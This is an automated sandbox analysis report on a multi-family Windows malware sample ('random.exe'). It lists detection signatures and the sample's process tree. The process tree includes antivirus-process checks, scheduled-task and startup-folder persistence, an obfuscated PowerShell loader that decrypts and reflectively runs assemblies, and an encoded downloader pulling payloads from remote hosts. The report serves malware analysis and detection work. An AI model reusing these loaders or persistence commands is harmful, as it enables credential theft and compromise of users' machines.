Windows
Analysis Report
random.exe
Overview
General Information
Detection
Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Search for Antivirus process
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AsyncRAT
Yara detected LummaC Stealer
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Drops script or batch files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
random.exe (PID: 7336 cmdline:
"C:\Users\ user\Deskt op\random. exe" MD5: 6236A0F253B635DB9DC436BCDF8760F1) skotes.exe (PID: 7552 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\abc3bc 1985\skote s.exe" MD5: 6236A0F253B635DB9DC436BCDF8760F1)
skotes.exe (PID: 7672 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\abc3bc1 985\skotes .exe MD5: 6236A0F253B635DB9DC436BCDF8760F1)
skotes.exe (PID: 8164 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\abc3bc1 985\skotes .exe MD5: 6236A0F253B635DB9DC436BCDF8760F1) dfd80aba08.exe (PID: 3164 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107254 2001\dfd80 aba08.exe" MD5: E6B7110E2C6E144296651B80F9B92A47) PAL947G2R107U02V5ZPL.exe (PID: 2084 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\PAL947 G2R107U02V 5ZPL.exe" MD5: ADB822A9A629882B5444563CF0B010DF) FQZHGI4TELUEK712J739LWFDT7.exe (PID: 6616 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\FQZHGI 4TELUEK712 J739LWFDT7 .exe" MD5: 6236A0F253B635DB9DC436BCDF8760F1) ae70ca0159.exe (PID: 7396 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107254 3001\ae70c a0159.exe" MD5: ADB822A9A629882B5444563CF0B010DF) 487dac876e.exe (PID: 7596 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107254 6001\487da c876e.exe" MD5: C3D89E95BFB66F5127AC1F2F3E1BD665) cmd.exe (PID: 3844 cmdline:
"C:\Window s\System32 \cmd.exe" /c copy Tu rner Turne r.cmd & Tu rner.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 7464 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) tasklist.exe (PID: 7752 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) findstr.exe (PID: 7764 cmdline:
findstr /I "opssvc w rsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) tasklist.exe (PID: 7796 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) findstr.exe (PID: 7804 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) cmd.exe (PID: 7856 cmdline:
cmd /c md 764661 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) extrac32.exe (PID: 2256 cmdline:
extrac32 / Y /E Fm MD5: 9472AAB6390E4F1431BAA912FCFF9707) findstr.exe (PID: 5088 cmdline:
findstr /V "Tunnel" Addresses MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) cmd.exe (PID: 5868 cmdline:
cmd /c cop y /b 76466 1\Macromed ia.com + T otally + Y ork + Drun k + Baghda d + Benz + Glasses + Pac + Ten der + Raci ng + Delux e + Derive d 764661\M acromedia. com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) cmd.exe (PID: 332 cmdline:
cmd /c cop y /b ..\Co mplement + ..\Soundt rack + ..\ Plumbing + ..\Hills F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Macromedia.com (PID: 3300 cmdline:
Macromedia .com F MD5: 62D09F076E6E0240548C2F837536A46A) schtasks.exe (PID: 6112 cmdline:
schtasks.e xe /create /tn "Achi llesGuard" /tr "wscr ipt //B 'C :\Users\us er\AppData \Local\Gua rdTech Sol utions\Ach illesGuard .js'" /sc onlogon /F /RL HIGHE ST MD5: 48C2FE20575769DE916F48EF0676A965) conhost.exe (PID: 3604 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) choice.exe (PID: 8036 cmdline:
choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4) e2b0a87ceb.exe (PID: 2416 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107254 7001\e2b0a 87ceb.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F) e2b0a87ceb.exe (PID: 2668 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107254 7001\e2b0a 87ceb.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F) WerFault.exe (PID: 8084 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 2 416 -s 940 MD5: C31336C1EFC2CCB44B4326EA793040F2) 5a4a47dccd.exe (PID: 480 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107254 8001\5a4a4 7dccd.exe" MD5: 8C6BAC3CE3F07DD9DBC8EB53E4BBB312) loqVSeJ.exe (PID: 2692 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107254 9001\loqVS eJ.exe" MD5: F662CB18E04CC62863751B672570BD7D) conhost.exe (PID: 2860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2916 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy rem otesigned -File "C:\ Users\user \AppData\L ocal\Temp\ 1072550041 \b6V4Rod.p s1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 4340 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 7780 cmdline:
"C:\Window s\system32 \cmd.exe" /c "C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ MyPayload. bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 7756 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 416 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $host.U I.RawUI.Wi ndowTitle= 'C:\Users\ user\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\MyP ayload.bat ';$cvIm='E ntFeXgryPF eXgoinFeXg tFeXg'.Rep lace('FeXg ', ''),'El eIXmOmeIXm OntIXmOAIX mOtIXmO'.R eplace('IX mO', ''),' DecOszEomO szEprOszEe OszEsOszEs OszE'.Repl ace('OszE' , ''),'CPU xvopPUxvyT PUxvoPUxv' .Replace(' PUxv', '') ,'RYWrpeaY WrpdLYWrpi YWrpnesYWr p'.Replace ('YWrp', ' '),'Cgarcr garcegarca tegarcDgar cecgarcrga rcypgarctg arcorgarc' .Replace(' garc', '') ,'LoIVFlaI VFldIVFl'. Replace('I VFl', ''), 'ChagsQKng gsQKeEgsQK xtgsQKegsQ KnsgsQKiog sQKngsQK'. Replace('g sQK', ''), 'MAaAUaiAa AUnAaAUMod AaAUulAaAU eAaAU'.Rep lace('AaAU ', ''),'Sp ojXFlitojX F'.Replace ('ojXF', ' '),'IFgBOn vFgBOokFgB OeFgBO'.Re place('FgB O', ''),'G evSbGtCuvS bGrrvSbGev SbGntvSbGP rvSbGovSbG cevSbGsvSb GsvSbG'.Re place('vSb G', ''),'T rUSbUansUS bUforUSbUm USbUFiUSbU naUSbUlBUS bUlUSbUock USbU'.Repl ace('USbU' , ''),'Fri YUfoiYUfmi YUfBaiYUfs e6iYUf4Sti YUfriniYUf giYUf'.Rep lace('iYUf ', '');pow ershell -w hidden;$m odules=[Sy stem.Diagn ostics.Pro cess]::($c vIm[11])() .Modules;i f ($module s -match ' hmpalert.d ll') { exi t; };funct ion DsOlp( $WSuTo){$f dRhP=[Syst em.Securit y.Cryptogr aphy.Aes]: :Create(); $fdRhP.Mod e=[System. Security.C ryptograph y.CipherMo de]::CBC;$ fdRhP.Padd ing=[Syste m.Security .Cryptogra phy.Paddin gMode]::PK CS7;$fdRhP .Key=[Syst em.Convert ]::($cvIm[ 13])('0L3q u7Et4bHK3W bvAGFJicWZ 8cEspciFOj tqHmR81xg= ');$fdRhP. IV=[System .Convert]: :($cvIm[13 ])('JIfnsD yTRqTk8ftu N6oGsw==') ;$QWYHd=$f dRhP.($cvI m[5])();$F unRP=$QWYH d.($cvIm[1 2])($WSuTo ,0,$WSuTo. Length);$Q WYHd.Dispo se();$fdRh P.Dispose( );$FunRP;} function M mHQh($WSuT o){$zZDvJ= New-Object System.IO .MemoryStr eam(,$WSuT o);$rZPaI= New-Object System.IO .MemoryStr eam;$bbTac =New-Objec t System.I O.Compress ion.GZipSt ream($zZDv J,[IO.Comp ression.Co mpressionM ode]::($cv Im[2]));$b bTac.($cvI m[3])($rZP aI);$bbTac .Dispose() ;$zZDvJ.Di spose();$r ZPaI.Dispo se();$rZPa I.ToArray( );}$zLeDh= [System.IO .File]::($ cvIm[4])([ Console]:: Title);$Qk JPW=MmHQh (DsOlp ([C onvert]::( $cvIm[13]) ([System.L inq.Enumer able]::($c vIm[1])($z LeDh, 5).S ubstring(2 ))));$gxzX U=MmHQh (D sOlp ([Con vert]::($c vIm[13])([ System.Lin q.Enumerab le]::($cvI m[1])($zLe Dh, 6).Sub string(2)) ));[System .Reflectio n.Assembly ]::($cvIm[ 6])([byte[ ]]$gxzXU). ($cvIm[0]) .($cvIm[10 ])($null,$ null);[Sys tem.Reflec tion.Assem bly]::($cv Im[6])([by te[]]$QkJP W).($cvIm[ 0]).($cvIm [10])($nul l,$null); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) powershell.exe (PID: 8068 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) Bjkm5hE.exe (PID: 6380 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107255 1001\Bjkm5 hE.exe" MD5: 0F2E0A4DAA819B94536F513D8BB3BFE2) 7fOMOTQ.exe (PID: 1196 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107255 2001\7fOMO TQ.exe" MD5: B348884FC13A1A86E9E3A38A647CCD24) 750afc9298.exe (PID: 7796 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107255 3001\750af c9298.exe" MD5: F071BEEBFF0BCFF843395DC61A8D53C8) dDFw6mJ.exe (PID: 8012 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\107255 4001\dDFw6 mJ.exe" MD5: DDBAC4A2E8251285D482AE1D2C1B6A58) cmd.exe (PID: 6784 cmdline:
cmd.exe /c 67a27a89a 5061.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 4856 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) wscript.exe (PID: 8076 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\IX P000.TMP\6 7a27a89a50 61.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 3796 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$dosigo = 'WwBO@GU@ d@@u@FM@ZQ By@HY@aQBj @GU@U@Bv@G k@bgB0@E0@ YQBu@GE@Zw Bl@HI@XQ@6 @Do@UwBl@G M@dQBy@Gk@ d@B5@F@@cg Bv@HQ@bwBj @G8@b@@g@D 0@I@Bb@E4@ ZQB0@C4@Uw Bl@GM@dQBy @Gk@d@B5@F @@cgBv@HQ@ bwBj@G8@b@ BU@Hk@c@Bl @F0@Og@6@F Q@b@Bz@DE@ Mg@N@@o@I@ @g@C@@I@@g @C@@I@@g@C @@I@@g@C@@ ZgB1@G4@Yw B0@Gk@bwBu @C@@R@Bv@H c@bgBs@G8@ YQBk@EQ@YQ B0@GE@RgBy @G8@bQBM@G k@bgBr@HM@ I@B7@C@@c@ Bh@HI@YQBt @C@@K@Bb@H M@d@By@Gk@ bgBn@Fs@XQ Bd@CQ@b@Bp @G4@awBz@C k@I@@N@@o@ I@@g@C@@I@ @g@C@@I@@g @C@@I@@g@C @@J@B3@GU@ YgBD@Gw@aQ Bl@G4@d@@g @D0@I@BO@G U@dw@t@E8@ YgBq@GU@Yw B0@C@@UwB5 @HM@d@Bl@G 0@LgBO@GU@ d@@u@Fc@ZQ Bi@EM@b@Bp @GU@bgB0@D s@I@@N@@o@ I@@g@C@@I@ @g@C@@I@@g @C@@I@@g@C @@J@Bz@Gg@ dQBm@GY@b@ Bl@GQ@T@Bp @G4@awBz@C @@PQ@g@Ec@ ZQB0@C0@Ug Bh@G4@Z@Bv @G0@I@@t@E k@bgBw@HU@ d@BP@GI@ag Bl@GM@d@@g @CQ@b@Bp@G 4@awBz@C@@ LQBD@G8@dQ Bu@HQ@I@@k @Gw@aQBu@G s@cw@u@Ew@ ZQBu@Gc@d@ Bo@Ds@I@@N @@o@I@@g@C @@I@@g@C@@ I@@g@C@@I@ @g@C@@ZgBv @HI@ZQBh@G M@a@@g@Cg@ J@Bs@Gk@bg Br@C@@aQBu @C@@J@Bz@G g@dQBm@GY@ b@Bl@GQ@T@ Bp@G4@awBz @Ck@I@B7@C @@d@By@Hk@ I@B7@C@@cg Bl@HQ@dQBy @G4@I@@k@H c@ZQBi@EM@ b@Bp@GU@bg B0@C4@R@Bv @Hc@bgBs@G 8@YQBk@EQ@ YQB0@GE@K@ @k@Gw@aQBu @Gs@KQ@g@H 0@I@Bj@GE@ d@Bj@Gg@I@ B7@C@@YwBv @G4@d@Bp@G 4@dQBl@C@@ fQ@g@H0@Ow @g@@0@Cg@g @C@@I@@g@C @@I@@g@C@@ I@@g@C@@I@ By@GU@d@B1 @HI@bg@g@C Q@bgB1@Gw@ b@@g@H0@Ow @g@@0@Cg@g @C@@I@@g@C @@I@@g@C@@ I@@g@C@@I@ @k@Gw@aQBu @Gs@cw@g@D 0@I@B@@Cg@ JwBo@HQ@d@ Bw@HM@Og@v @C8@YgBp@H Q@YgB1@GM@ awBl@HQ@Lg Bv@HI@Zw@v @GM@YwBj@G M@YwBj@GM@ YwBj@GM@Yw Bj@G4@bQBm @Gc@LwBn@H Y@Z@Bm@Gg@ Z@@v@GQ@bw B3@G4@b@Bv @GE@Z@Bz@C 8@d@Bl@HM@ d@@u@Go@c@ Bn@D8@MQ@z @Dc@MQ@x@D M@Jw@s@C@@ JwBo@HQ@d@ Bw@HM@Og@v @C8@bwBm@G k@YwBl@DM@ Ng@1@C4@Zw Bp@HQ@a@B1 @GI@LgBp@G 8@Lw@x@C8@ d@Bl@HM@d@ @u@Go@c@Bn @Cc@KQ@7@@ 0@Cg@g@C@@ I@@g@C@@I@ @g@C@@I@@g @C@@I@@g@C Q@aQBt@GE@ ZwBl@EI@eQ B0@GU@cw@g @D0@I@BE@G 8@dwBu@Gw@ bwBh@GQ@R@ Bh@HQ@YQBG @HI@bwBt@E w@aQBu@Gs@ cw@g@CQ@b@ Bp@G4@awBz @Ds@DQ@K@C @@I@@g@C@@ I@@g@C@@I@ @g@C@@I@@g @C@@aQBm@C @@K@@k@Gk@ bQBh@Gc@ZQ BC@Hk@d@Bl @HM@I@@t@G 4@ZQ@g@CQ@ bgB1@Gw@b@ @p@C@@ew@g @CQ@aQBt@G E@ZwBl@FQ@ ZQB4@HQ@I@ @9@C@@WwBT @Hk@cwB0@G U@bQ@u@FQ@ ZQB4@HQ@Lg BF@G4@YwBv @GQ@aQBu@G c@XQ@6@Do@ VQBU@EY@O@ @u@Ec@ZQB0 @FM@d@By@G k@bgBn@Cg@ J@Bp@G0@YQ Bn@GU@QgB5 @HQ@ZQBz@C k@Ow@N@@o@ I@@g@C@@I@ @g@C@@I@@g @C@@I@@g@C @@I@@k@HM@ d@Bh@HI@d@ BG@Gw@YQBn @C@@PQ@g@C c@P@@8@EI@ QQBT@EU@Ng @0@F8@UwBU @EE@UgBU@D 4@Pg@n@Ds@ I@@k@GU@bg Bk@EY@b@Bh @Gc@I@@9@C @@Jw@8@Dw@ QgBB@FM@RQ @2@DQ@XwBF @E4@R@@+@D 4@Jw@7@C@@ J@Bz@HQ@YQ By@HQ@SQBu @GQ@ZQB4@C @@PQ@g@CQ@ aQBt@GE@Zw Bl@FQ@ZQB4 @HQ@LgBJ@G 4@Z@Bl@Hg@ TwBm@Cg@J@ Bz@HQ@YQBy @HQ@RgBs@G E@Zw@p@Ds@ I@@N@@o@I@ @g@C@@I@@g @C@@I@@g@C @@I@@g@C@@